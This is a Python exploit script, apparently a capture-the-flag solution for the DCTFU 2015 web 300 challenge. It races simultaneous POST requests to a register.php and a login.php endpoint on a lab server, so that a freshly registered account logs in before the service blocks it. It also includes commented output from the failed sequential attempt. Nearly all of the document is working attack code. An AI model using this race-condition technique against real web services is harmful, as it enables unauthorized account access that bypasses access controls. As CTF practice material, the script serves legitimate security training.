Exploit register and login web service using timing attack for DCTFU CTF 2015 web 300 challenge

pwn.py

#!/usr/bin/python
#See article on https://whitehatters.academy/

#target server http:10.13.37.4  (on VPN for DCTFU 2015 quals CTF)

import requests            # see http://stackoverflow.com/questions/4476373/simple-url-get-post-function-in-python
import multiprocessing     # see http://stackoverflow.com/questions/6286235/multiple-threads-in-python

# we need to run register.php and login.php at the same time

baseurl = "http://10.13.37.4/"

username = "blobbyD"

password = "goblob"
md5pwd = "476b56907764207c05e118caaf9f9d96"     # need this to register, is md5sum of the goblob password

# then need to fire up register, fire up login immediately
# capture output from both

def DoRegister():
   url = baseurl + "register.php"
   payload = {'username' : username, 'password' : md5pwd}

   r = requests.post(url, data=payload)

   print "REGISTER:[%s]" % r.text


def DoLogin():
   url = baseurl + "login.php"
   payload = {'username' : username, 'password' : password}

   r = requests.post(url, data=payload)

   print "LOGIN:[%s]" % r.text



if __name__ == "__main__":
   if False:
      DoRegister()
      DoLogin()
      SEQUENTIAL_FAILS="""
REGISTER:[	<h2>Congrats! Login now!</h2>
	]
LOGIN:[ <h1>Logged in as </h1>Your user was automatically blocked]
"""

   if True:    # simultaneous - timing attack
      processRegister = multiprocessing.Process(target=DoRegister)
      processDoLogin = multiprocessing.Process(target=DoLogin)
      processRegister.start()
      processDoLogin.start()